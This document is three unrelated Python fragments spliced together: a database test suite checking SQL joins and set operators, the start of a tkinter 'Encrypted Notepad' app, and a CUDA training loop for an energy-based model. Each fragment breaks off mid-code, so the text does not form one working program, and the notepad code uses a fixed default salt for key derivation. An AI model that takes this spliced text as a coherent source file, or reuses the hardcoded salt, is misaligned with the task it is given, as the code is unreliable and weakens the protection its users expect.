in results:
c = c + 1
self.assertEqual(14, c, "ERROR: Data Difference")
self.cursor.execute("SELECT * FROM all_datatypes AS tab1 LEFT OUTER "
"JOIN all_datatypes AS tab2 USING(a_char20) "
"ORDER BY tab1.a_srno,tab2.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, \
c12, c13, c14, c15, c16, c17, c18, c19, c20, c21, \
d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, \
d14, d15, d16, d17, d18, d19, d20 \
in results:
c = c + 1
self.assertEqual(14, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_Joins3(self):
self.performOperation("./setup_all_datatype")
self.performOperation("./setup_all_latin")
self.cursor.execute("SELECT * FROM all_Latin_datatypes, all_datatypes "
"ORDER BY all_latin_datatypes.a_srno,"
"all_datatypes.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10,\
c11, c12, c13, c14, c15, c16, c17, c18, c19, c20, \
c21, d1, d2, d3, d4, d5 \
in results:
c = c + 1
self.assertEqual(180, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
self.cursor.execute("drop table all_latin_datatypes")
def test_DirectMixedComments(self):
self.cursor.execute("CREATE TABLE test (int1 int, char1 char)")
self.cursor.execute("INSERT INTO test VALUES /* "
"this is a comment */ (1, 'c')")
self.assertEqual(1, self.cursor.rowcount, "ERROR: Data Difference")
self.cursor.execute("INSERT INTO test VALUES -- "
"this is a comment \n (2, 'a')")
self.assertEqual(1, self.cursor.rowcount, "ERROR: Data Difference")
self.cursor.execute("INSERT INTO test VALUES /* this is "
"-- a comment */ (3, 'b')")
self.assertEqual(1, self.cursor.rowcount, "ERROR: Data Difference")
self.cursor.execute("drop table test ")
def test_NumericFnEscSeq(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT abs(a_int), abs(a_smallint), "
"abs (a_bigint), "
"abs(a_double), abs(a_numps) FROM all_datatypes "
"ORDER BY a_srno limit 1")
results = self.cursor.fetchall()
for c1, c2, c3, c4, c5 in results:
self.assertEqual(798339977, c1, "ERROR: Data Difference")
self.assertEqual(31380, c2, "ERROR: Data Difference")
self.assertEqual(780406997461985024, c3, "ERROR: Data Difference")
self.assertEqual(4242424422.60277, c4, "ERROR: Data Difference")
self.assertEqual('53.00000000000000', c5, "ERROR: Data Difference")
self.cursor.execute("SELECT round(a_numps), round(a_real), "
"round(a_double) "
"FROM all_datatypes ORDER BY a_srno limit 1")
results = self.cursor.fetchall()
for c1, c2, c3 in results:
self.assertEqual('53', c1, "ERROR: Data Difference")
self.assertEqual(0, c2, "ERROR: Data Difference")
self.assertEqual(-4242424423, c3, "ERROR: Data Difference")
self.cursor.execute("SELECT sqrt(a_srno), sqrt(a_nump) "
"FROM all_datatypes "
"ORDER BY a_srno limit 1")
results = self.cursor.fetchall()
for c1, c2 in results:
self.assertEqual(7.615773105863909, c1, "ERROR: Data Difference")
self.assertEqual(None, c2, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_SetOperator1(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT a_srno, a_char5, a_varchar1 "
"FROM all_datatypes "
"WHERE a_srno = ANY (SELECT a_srno "
"FROM all_datatypes "
"WHERE a_char1000 LIKE ?) ORDER "
"BY a_srno", ('%',))
results = self.cursor.fetchall()
c = 0
for c1, c2, c3 in results:
c = c + 1
self.assertEqual(12, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno, a_char5, a_date FROM "
"all_datatypes "
"WHERE a_srno = SOME (SELECT a_srno "
"FROM all_datatypes "
"WHERE a_date LIKE ?) ORDER BY a_srno", ('%',))
results = self.cursor.fetchall()
c = 0
for c1, c2, c3 in results:
c = c + 1
self.assertEqual(11, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno,a_varchar50 "
"FROM all_datatypes "
"a WHERE a_srno > ALL "
"(SELECT a_srno FROM all_datatypes "
"b WHERE a.a_srno <> b.a_srno)")
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(1, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_SetOperator2(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT a_srno, a_char20 FROM "
"all_datatypes WHERE EXISTS "
"(SELECT a_srno FROM all_datatypes "
"WHERE a_char5 LIKE ?) "
"ORDER BY a_srno LIMIT 5", ('%',))
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(5, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno,a_char20, a_interval "
"FROM all_datatypes "
"WHERE NOT EXISTS (SELECT a_char5 FROM "
"all_datatypes WHERE a_interval LIKE ?) "
"ORDER BY a_srno DESC LIMIT 5",
('25 years 67 days 18 hours 10 minutes',))
results = self.cursor.fetchall()
c = 0
for c1, c2, c3 in results:
c = c + 1
self.assertEqual(5, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_SetOperator3(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT a_srno, a_char20 FROM all_datatypes "
"WHERE a_char20 NOT IN (a_char5, "
"a_varchar50 )ORDER BY a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(11, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno, a_time FROM all_datatypes a WHERE "
"a_srno IN (SELECT a_srno FROM all_datatypes b "
"WHERE a.a_srno = b.a_srno) ORDER BY a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(12, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno, a_nump FROM "
"all_datatypes WHERE a_char5 "
"NOT IN (a_varchar1) AND a_srno "
"IN (SELECT a_srno FROM "
"all_datatypes WHERE a_nump IS "
"NOT NULL) ORDER BY a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(9, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_SetOperator4(self):
self.performOperation("./setup_all_latin")
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT a_srno, a_char20, "
"a_char1000 FROM all_datatypes "
"UNION SELECT a_srno, a_char10, "
"a_char1000 FROM all_latin_datatypes "
"WHERE a_srno IN (SELECT a_srno "
"FROM all_datatypes WHERE a_nump "
"IS NOT NULL)"
" ORDER BY a_srno")
results = self.cursor.fetchall()
c = 0
| |
<reponame>kajitetsuya/Encrypted_Notepad<gh_stars>0
"""
Encrypted Notepad
Copyright (c) 2020 by <NAME>
This software is licensed by the MIT license.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Except as contained in this notice, the name(s) of the above copyright holders
shall not be used in advertising or otherwise to promote the sale, use or
other dealings in this Software without prior written authorization.
Icon made by Freepik from www.flaticon.com
"""
# https://stackoverflow.com/questions/23571407/how-to-i-have-the-call-back-in-tkinter-when-i-change-the-current-insert-position
# Problem with 'sel':
# https://stackoverflow.com/questions/47184080/how-do-i-track-whether-a-tkinter-text-widget-has-been-modified-using-a-proxy-tha
# Solution to 'sel':
# https://codereview.stackexchange.com/questions/178139/simple-tkinter-gui-that-uses-a-popup-menu-class
# Printing function seems to be not platform-free
# https://stackoverflow.com/questions/12723818/print-to-standard-printer-from-python
# Tuple ()
# List []
# Set {}
# Dictionary
# https://www.iconfinder.com/iconsets/filetype-4
# https://www.iconfinder.com/iconsets/material-circle-apps
# https://www.iconfinder.com/iconsets/basic-ui-1-line
# https://www.iconfinder.com/iconsets/security-double-colour-blue-black-vol-1
# Icons made by <a href="http://www.freepik.com/" title="Freepik">Freepik</a> from <a href="https://www.flaticon.com/" title="Flaticon"> www.flaticon.com</a>
# https://www.flaticon.com/free-icon/lock_2913133?term=security&page=2&position=2
# https://medium.com/sanchit-gupta/executable-gui-with-python-fc79562a5558
# https://github.com/pyinstaller/pyinstaller/issues/4047
# https://stackoverflow.com/questions/38674400/missing-dll-files-when-using-pyinstaller/38682416
# Create a Python environment named 'crypto_regex_pyinstaller_env' with packages cryptography, regex, and pyinstaller
# Put security.ico in the source folder along with this file
# Open the PowerShell and move to the source folder and execute
# pyinstaller Encrypted_Notepad.py --onefile --noconsole --name=enotepad --paths=C:\Users\User\.conda\envs\crypto_regex_pyinstaller_env\Library\bin --icon=security.ico --add-data="security.ico;."
# https://stackoverflow.com/questions/47840633/hide-console-window-by-an-exe-file-executed-by-a-py-script
# https://stackoverflow.com/questions/41129537/hide-the-console-of-an-exe-file-created-with-pyinstaller
# Want to also use the "-key" option
# https://pyinstaller.readthedocs.io/en/stable/usage.html#options
# Implement encoding
# Remember open folder (this is already implemented... how does it work?)
# When you maximize the window with double click on the title bar, the selection is canceled...
# This happens because a single click is induced at the place double click took place.
# So if you bring the normal window at the top (so that the point at which you double click will not be in the text
# even after maximizing the window), then the selection is not canceled...
# Bind delete directly to the internal listbox object
# => Well, then we also need to add the new keyword to the list through the internal listbox, which is too much dependence on the internal object IMO.
import sys
import tkinter as tk
from tkinter import filedialog
from tkinter import simpledialog
from tkinter.simpledialog import Dialog
from tkinter import messagebox
from tkinter import font
#from tkinter.font import families
from tkinter import ttk
from tkinter import colorchooser
from tkinter.colorchooser import askcolor
#from tkinter import commondialog
#import tkfontchooser
#from tkfontchooser import askfont
from datetime import datetime
# To create a "generate random string" functionality
import os
import string
from random import *
# To open OnScreen Keyboard on Windows
import platform
import subprocess
# subprocess.Popen(['osk'], shell=True) # Windows
# os.system('open -a KeyboardViewer') # Mac
# To encrypt / decrypt the files
import base64
from base64 import binascii
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.fernet import Fernet, InvalidToken
# There are three Reg Ex packages that can be used: Tcl (Tkinter built-in), re (Python built-in), regex (Python package that intend to replace re in the future)
# - Tcl can do backward search but cannot do symbolic substitution
# - re can do symbolic substitution but cannot do backward search
# - regex can do both
# So we go with regex.
#
# Difference between Python re and Tcl RegEx
# http://www.greenend.org.uk/rjk/tech/regexp.html
# https://bugs.python.org/issue516762
# https://pypi.org/project/regex/
import regex as re # This is *different* from 'import re'
import webbrowser # To create a hyperlink to a regex tutorial website
import configparser
import ast
# https://stackoverflow.com/questions/214359/converting-hex-color-to-rgb-and-vice-versa
# https://stackoverflow.com/a/40809696
def hex_to_rgb(hex):
"""Return (red, green, blue) for the color given as #rrggbb."""
hex = hex.lstrip('#')
lv = len(hex)
return tuple(int(hex[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))
# 16-bit RGB (each component is max 65535) to hex
# For 8-bit, we need to use '#%02x%02x%02x' % rgb, but we don't need for this
# https://bugs.python.org/issue33289
def rgb16_to_hex(rgb):
"""Return color as #rrggbb for the given color values."""
return '#%04x%04x%04x' % rgb
# https://stackoverflow.com/questions/596216/formula-to-determine-brightness-of-rgb-color
# On the scale of RGB (0-255 for 8-bit, 0-65535 for 16-bit)
def rgb_to_brightness(rgb):
return 0.2126*rgb[0] + 0.7152*rgb[1] + 0.0722*rgb[2]
# Hex can be of #ffffffffffff or of #ffffff. For each, this works.
# On the scale of 0.0 - 1.0
def hex_to_brightness(hex):
return rgb_to_brightness(hex_to_rgb(hex)) / (16**((len(hex)-1)//3)-1)
class ConfigParser2(configparser.ConfigParser):
def __init__(self, *args, **kwargs):
configparser.ConfigParser.__init__(self, *args, **kwargs)
# get with a default value option
def get2(self, section, option, default):
if not self.has_section(section):
self.add_section(section)
if not self.has_option(section, option):
self.set(section, option, default)
return self.get(section, option)
# getint with a default value option
# if no section / option, add the default value to self and returns it
# if an existing option is not of int type, then set it to default and returns it
def getint2(self, section, option, default):
if not self.has_section(section):
self.add_section(section)
if not self.has_option(section, option):
self.set(section, option, str(default))
try:
return self.getint(section, option)
except ValueError:
self.set(section, option, str(default))
return self.getint(section, option)
# getboolean with a default value option
# if no section / option, add the default value to self and returns it
# if an existing option is not of boolean type, then set it to default and returns it
def getboolean2(self, section, option, default):
if not self.has_section(section):
self.add_section(section)
if not self.has_option(section, option):
self.set(section, option, str(default))
try:
return self.getboolean(section, option)
except ValueError:
self.set(section, option, str(default))
return self.getboolean(section, option)
def read(self, file):
self.config_file = file
super().read(file)
def write2(self):
f = open(self.config_file, 'w')
self.write(f)
f.close()
class Notepad(ttk.Frame):
def __init__(self, *args, cp='', salt=b'salt_', iterations=100000, **kwargs):
ttk.Frame.__init__(self, *args, **kwargs)
self.text = tk.Text(self, undo=True, autoseparators=True)
self.vscroll = ttk.Scrollbar(self, orient='vertical')
self.hscroll = ttk.Scrollbar(self, orient='horizontal')
self.menu = tk.Menu(self)
self.master.config(menu=self.menu)
# Implement status bar as a Frame with three gridded Labels
# http://zetcode.com/tkinter/layout/
self.status = ttk.Frame(self)
self.status.misc = tk.Label(self.status, bd=1, relief='sunken', text='', anchor='w')
self.status.misc.grid(row=1, column=0, sticky='sew')
self.status.cursor = tk.Label(self.status, bd=1, relief='sunken', text='', anchor='w')
self.status.cursor.grid(row=1, column=1, sticky='sew')
self.status.count = tk.Label(self.status, bd=1, relief='sunken', text='', anchor='w')
self.status.count.grid(row=1, column=2, sticky='sew')
#self.status.encoding = tk.Label(self.status, bd=1, relief='sunken', text='', anchor='w')
#self.status.encoding.grid(row=1, column=3, sticky='sew')
# Evenly space status bars
# https://webcache.googleusercontent.com/search?q=cache:3h0isl3ZrqEJ:https://www.e-learn.cn/topic/3015315+&cd=4&hl=en&ct=clnk&gl=us&client=firefox-b-1-d
self.status.grid_columnconfigure(0, weight=1, uniform='a')
self.status.grid_columnconfigure(1, weight=1, uniform='a')
self.status.grid_columnconfigure(2, weight=1, uniform='a')
#self.status.grid_columnconfigure(3, weight=1, uniform='a')
self.hscroll.show = lambda: self.hscroll.grid(row=1, column=0, sticky='ew')
self.hscroll.hide = lambda: self.hscroll.grid_forget()
self.status.show = lambda: self.status.grid(row=2, column=0, columnspan=2, sticky='esw')
self.status.hide = lambda: self.status.grid_forget()
self.text.grid(row=0, column=0, sticky='nesw')
self.vscroll.grid(row=0, column=1, sticky='nes')
self.hscroll.show()
self.status.show()
self.grid_columnconfigure(0, weight=1)
self.grid_rowconfigure(0, weight=1)
self.vscroll.config(command=self.text.yview)
self.hscroll.config(command=self.text.xview)
self.text.configure(yscrollcommand=self.vscroll.set)
self.text.configure(xscrollcommand=self.hscroll.set)
#self.text.bind('<<CursorChange>>', self._on_change)
#self.text.bind('<<Selection>>', self._on_change)
# Beware that these hacks do not support direct text/cursor modifications by executing insert(), tag_add('sel'), etc.
self.text.bind('<KeyRelease>', self._on_change)
self.text.bind('<ButtonRelease-1>', self._on_change)
self.text.bind('<B1-Motion>', self._on_change)
self.text.bind('<<Selection>>', self._on_selection)
self.fpath = '' # file path
self.fname = 'Untitled' # file name
self.key1 = None # master key for read-only key encryption
self.key2 = None # read-only key for text encryption
self.salt = salt # sald for encryption
self.iter = iterations # iterations for encryption
#self.text.tag_configure('match', foreground='white', background='royal blue')
self.text.tag_configure('match', foreground=self.text.tag_cget('sel', 'foreground'), background=self.text.tag_cget('sel', 'background'))
self.text.tag_configure('find all', background='orange red')
self.text.tag_raise('sel')
self.rect_select_on = tk.BooleanVar()
self.wrap_type = tk.IntVar()
self.status_on = tk.BooleanVar()
# use configparser to load settings
self.cp = cp
# text format
self.font = font.Font(
family=self.cp.get2('settings', 'font', 'Courier New'),
size=self.cp.getint2('settings', 'size', 10),
weight='bold' if self.cp.getboolean2('settings', 'bold', False) else 'normal',
slant='italic' if self.cp.getboolean2('settings', 'italic', False) else 'roman',
underline=self.cp.getboolean2('settings', 'underline', False),
overstrike=self.cp.getboolean2('settings', 'strikeout', False)
)
# color
self.text.config(font=self.font,
foreground=self.cp.get2('settings', 'text_color', self.text.cget('foreground')),
background=self.cp.get2('settings', 'background_color', self.text.cget('background'))
)
self.text.tag_configure('normal', background=self.text.cget('background'))
# adjust the cursor color
if rgb_to_brightness(self.winfo_rgb(self.text.cget('background'))) > 0.5: # Bright => Make the cursor black
self.text.config(insertbackground='black')
else: # Bright => Make the cursor white
self.text.config(insertbackground='white')
# misc
self.wrap_type.set(self.cp.getint2('settings', 'wrap_type', 0))
self.status_on.set(self.cp.getboolean2('settings', 'status_bar', True))
# search settings
self.fr = self.FindReplace(self,
ignorecase=self.cp.getboolean2('settings', 'ignore_case', True),
wholeword=self.cp.getboolean2('settings', 'whole_word', False),
withinsel=self.cp.getboolean2('settings', 'within_selection', False),
regexp=self.cp.getboolean2('settings', 'regular_expression', False)
)
self.fr.withdraw()
# recent files
self.recent_files = ast.literal_eval(self.cp.get2('settings', 'recent_files', '[]'))
self.menu_file = tk.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='File', underline=0, menu=self.menu_file)
self.menu_file.add_command(label='New', underline=0, command=self._on_new_file, accelerator='Ctrl+N')
self.text.bind('<Control-n>', self._on_new_file)
self.menu_file.add_command(label='Open...', underline=0, command=self._on_open_file, accelerator='Ctrl+O')
self.text.bind('<Control-o>', self._on_open_file)
self.menu_file.add_command(label='Save', underline=0, command=self._on_save_file, accelerator='Ctrl+S')
self.text.bind('<Control-s>', self._on_save_file)
self.menu_file.add_command(label='Save As...', underline=5, command=self._on_save_file_as, accelerator='Ctrl+Shift+S')
self.text.bind('<Control-Shift-s>', self._on_save_file_as)
self.menu_file.add_separator()
| |
: modified version of the original train function.
Additions : GPU selection (useful for multi-GPU machines)
Saving the sum of the square of the data for post-processing
Visible data are saved
Data samples are permuted for training
Weights are saved every 100 training epochs
Training energy is visualized every 100 training epochs
NOTE : anneal learning rate used in the initial code, is NOT used here!
'''
#plt.ion()
f1 = plt.figure()
ax1 = f1.add_subplot(111)
#ax2 = f1.add_subplot(122)
#plt.show()
cmt.cuda_set_device(self.gpuId)
cmt.cublas_init()
cmt.CUDAMatrix.init_random(1)
np.random.seed(self.npRandSeed)
prng = RandomState(self.npRandState)
################################################################
##################### CHANGE PATH ##############################
# Move to current experiment path:
os.chdir(self.saveDir)
# Get current path:
os.getcwd()
self.plotsDir = 'plots'
#self.probabilitiesDir = 'p_all'
if not os.path.isdir(self.plotsDir):
os.makedirs(self.plotsDir)
if not os.path.isdir(self.plotsDir + '/energy'):
os.makedirs(self.plotsDir + '/energy')
#if not os.path.isdir(self.probabilitiesDir):
# os.makedirs(self.probabilitiesDir)
if not os.path.isdir('weights'):
os.makedirs('weights')
d = self.d.astype(np.float32)
print("visible size: ", d.shape)
dsq = np.square(d)
lsq = np.sum(dsq, axis=0)
with open('lsqComplete.pkl', 'wb') as pklFile:
cPickle.dump(lsq, pklFile)
del dsq, lsq
# Save visible data :
visData = d
np.savez('visData.npz', data=d, obsKeys=self.obsKeys, epochTime=self.epochTime)
with open ('visData.txt','w') as f:
f.write("\n Dataset : %s" %(self.dataFilename))
f.write("\n visData size: %s " % str(visData.shape))
f.write("\n visData type: %s " % str(visData.dtype))
f.write("\n \n visData Range: %s " % str(np.max(visData, axis=0)-np.min(visData, axis=0)))
f.write("\n \n visData min: %s " % str(np.min(visData, axis=0)))
f.write("\n \n visData max: %s " % str(np.max(visData, axis=0)))
f.write("\n \n visData mean: %s " % str(np.mean(visData, axis=0)))
f.write("\n \n visData std: %s " % str(np.std(visData, axis=0)))
f.close()
del visData #if not needed for computing the latent states
permIdx = prng.permutation(d.shape[0])
d = d[permIdx,:]
#subsetting train and test datasets
#trainPerc = 0.7
#trainSampNum = int(np.ceil(trainPerc*d.shape[0]))
#trainSampNum = int(np.floor(trainSampNum/self.batch_size)*self.batch_size)
#testSampNum = int(d.shape[0]-trainSampNum-1)
# The test dataset is not used at the moment, it can be used as
# a validation set to check for overfitting. To use it, uncomment
# all the variables with 'test' in their name
#~ d_test = d[trainSampNum+1:,:]
#d = d[:trainSampNum,:]
#obsKeys = self.obsKeys[:trainSampNum]
totnumcases = d.shape[0]
num_vis = d.shape[1]
num_batches = int(totnumcases/self.batch_size)
print("num_batches: ", num_batches)
dev_dat = cmt.CUDAMatrix(d.T) # VxP
#~ test_dat = cmt.CUDAMatrix(d_test.T)
del d, self.d, self.epochTime, self.obsKeys
# training parameters (as in the original code by Ranzato)
epsilon = self.epsilon
epsilonVF = 2*epsilon
epsilonFH = 0.02*epsilon
epsilonb = 0.02*epsilon
epsilonw_mean = 0.2*epsilon
epsilonb_mean = 0.1*epsilon
weightcost_final = self.weightcost_final
# HMC setting
hmc_step_nr = self.hmc_step_nr
hmc_step = 0.01
hmc_target_ave_rej = self.hmc_target_ave_rej
hmc_ave_rej = hmc_target_ave_rej
# initialize weights
VF = cmt.CUDAMatrix(np.array(0.02 * prng.randn(num_vis, self.num_fac), dtype=np.float32, order='F')) # VxH
if self.apply_mask == 0:
FH = cmt.CUDAMatrix( np.array( np.eye(self.num_fac,self.num_hid_cov), dtype=np.float32, order='F') ) # HxO
else:
dd = loadmat('your_FHinit_mask_file.mat') # see CVPR2010paper_material/topo2D_3x3_stride2_576filt.mat for an example
FH = cmt.CUDAMatrix( np.array( dd["FH"], dtype=np.float32, order='F') )
bias_cov = cmt.CUDAMatrix( np.array(2.0*np.ones((self.num_hid_cov, 1)), dtype=np.float32, order='F') )
bias_vis = cmt.CUDAMatrix( np.array(np.zeros((num_vis, 1)), dtype=np.float32, order='F') )
w_mean = cmt.CUDAMatrix( np.array( 0.05 * prng.randn(num_vis, self.num_hid_mean), dtype=np.float32, order='F') ) # VxH
bias_mean = cmt.CUDAMatrix( np.array( -2.0*np.ones((self.num_hid_mean,1)), dtype=np.float32, order='F') )
# initialize variables to store derivatives
VFinc = cmt.CUDAMatrix( np.array(np.zeros((num_vis, self.num_fac)), dtype=np.float32, order='F'))
FHinc = cmt.CUDAMatrix( np.array(np.zeros((self.num_fac, self.num_hid_cov)), dtype=np.float32, order='F'))
bias_covinc = cmt.CUDAMatrix( np.array(np.zeros((self.num_hid_cov, 1)), dtype=np.float32, order='F'))
bias_visinc = cmt.CUDAMatrix( np.array(np.zeros((num_vis, 1)), dtype=np.float32, order='F'))
w_meaninc = cmt.CUDAMatrix( np.array(np.zeros((num_vis, self.num_hid_mean)), dtype=np.float32, order='F'))
bias_meaninc = cmt.CUDAMatrix( np.array(np.zeros((self.num_hid_mean, 1)), dtype=np.float32, order='F'))
# initialize temporary storage
data = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
normdata = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
negdataini = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
feat = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, self.batch_size)), dtype=np.float32, order='F'))
featsq = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, self.batch_size)), dtype=np.float32, order='F'))
negdata = cmt.CUDAMatrix( np.array(prng.randn(num_vis, self.batch_size), dtype=np.float32, order='F'))
old_energy = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F'))
new_energy = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F'))
energy = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F'))
gradient = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
normgradient = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F')) # VxP
thresh = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F'))
feat_mean = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_mean, self.batch_size)), dtype=np.float32, order='F'))
vel = cmt.CUDAMatrix( np.array(prng.randn(num_vis, self.batch_size), dtype=np.float32, order='F'))
length = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F')) # 1xP
lengthsq = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F')) # 1xP
normcoeff = cmt.CUDAMatrix( np.array(np.zeros((1, self.batch_size)), dtype=np.float32, order='F')) # 1xP
# commented to avoid computing the energy on test data
#~ data_test = cmt.CUDAMatrix( np.array(np.empty((num_vis, testSampNum)), dtype=np.float32, order='F')) # Vxtest_batch
#~ normdata_test = cmt.CUDAMatrix( np.array(np.empty((num_vis, testSampNum)), dtype=np.float32, order='F')) # Vxtest_batch
#~ length_test = cmt.CUDAMatrix( np.array(np.zeros((1, testSampNum)), dtype=np.float32, order='F')) # 1xtest_batch
#~ lengthsq_test = cmt.CUDAMatrix( np.array(np.zeros((1, testSampNum)), dtype=np.float32, order='F')) # 1xtest_batch
#~ normcoeff_test = cmt.CUDAMatrix( np.array(np.zeros((1, testSampNum)), dtype=np.float32, order='F')) # 1xtest_batch
#~ vel_test = cmt.CUDAMatrix( np.array(prng.randn(num_vis, testSampNum), dtype=np.float32, order='F'))
#~ feat_test = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, testSampNum)), dtype=np.float32, order='F'))
#~ featsq_test = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, testSampNum)), dtype=np.float32, order='F'))
#~ feat_mean_test = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_mean, testSampNum)), dtype=np.float32, order='F'))
#~ energy_test = cmt.CUDAMatrix( np.array(np.zeros((1, testSampNum)), dtype=np.float32, order='F'))
if self.apply_mask==1: # this used to constrain very large FH matrices only allowing to change values in a neighborhood
dd = loadmat('your_FHinit_mask_file.mat')
mask = cmt.CUDAMatrix( np.array(dd["mask"], dtype=np.float32, order='F'))
normVF = 1
small = 0.5
# other temporary vars
t1 = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_cov, self.batch_size)), dtype=np.float32, order='F'))
t2 = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_cov, self.batch_size)), dtype=np.float32, order='F'))
t3 = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, self.batch_size)), dtype=np.float32, order='F'))
t4 = cmt.CUDAMatrix( np.array(np.empty((1,self.batch_size)), dtype=np.float32, order='F'))
t5 = cmt.CUDAMatrix( np.array(np.empty((1,1)), dtype=np.float32, order='F'))
t6 = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F'))
t7 = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.batch_size)), dtype=np.float32, order='F'))
t8 = cmt.CUDAMatrix( np.array(np.empty((num_vis, self.num_fac)), dtype=np.float32, order='F'))
t9 = cmt.CUDAMatrix( np.array(np.zeros((self.num_fac, self.num_hid_cov)), dtype=np.float32, order='F'))
t10 = cmt.CUDAMatrix( np.array(np.empty((1,self.num_fac)), dtype=np.float32, order='F'))
t11 = cmt.CUDAMatrix( np.array(np.empty((1,self.num_hid_cov)), dtype=np.float32, order='F'))
# commented to avoid computing the energy on test data
#~ t1_test = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_cov, testSampNum)), dtype=np.float32, order='F'))
#~ t2_test = cmt.CUDAMatrix( np.array(np.empty((self.num_hid_cov, testSampNum)), dtype=np.float32, order='F'))
#~ t3_test = cmt.CUDAMatrix( np.array(np.empty((self.num_fac, testSampNum)), dtype=np.float32, order='F'))
#~ t4_test = cmt.CUDAMatrix( np.array(np.empty((1,testSampNum)), dtype=np.float32, order='F'))
#~ t5_test = cmt.CUDAMatrix( np.array(np.empty((1,1)), dtype=np.float32, order='F'))
#~ t6_test = cmt.CUDAMatrix( np.array(np.empty((num_vis, testSampNum)), dtype=np.float32, order='F'))
meanEnergy = np.zeros(self.num_epochs)
minEnergy = np.zeros(self.num_epochs)
maxEnergy = np.zeros(self.num_epochs)
#~ meanEnergy_test = np.zeros(self.num_epochs)
#~ minEnergy_test = np.zeros(self.num_epochs)
#~ maxEnergy_test = np.zeros(self.num_epochs)
# start training
for epoch in range(self.num_epochs):
print ("Epoch " + str(epoch))
# anneal learning rates as found in the original code -
# uncomment if you wish to use annealing!
#~ epsilonVFc = epsilonVF/max(1,epoch/20)
#~ epsilonFHc = epsilonFH/max(1,epoch/20)
#~ epsilonbc = epsilonb/max(1,epoch/20)
#~ epsilonw_meanc = epsilonw_mean/max(1,epoch/20)
#~ epsilonb_meanc = epsilonb_mean/max(1,epoch/20)
# no annealing is used in our experiments because learning
# was stopping too early
epsilonVFc = epsilonVF
epsilonFHc = epsilonFH
epsilonbc = epsilonb
epsilonw_meanc = epsilonw_mean
epsilonb_meanc = epsilonb_mean
weightcost = weightcost_final
if epoch <= self.startFH:
epsilonFHc = 0
if epoch <= self.startwd:
weightcost = 0
# commented to avoid computing the energy on test data
#~ data_test = test_dat
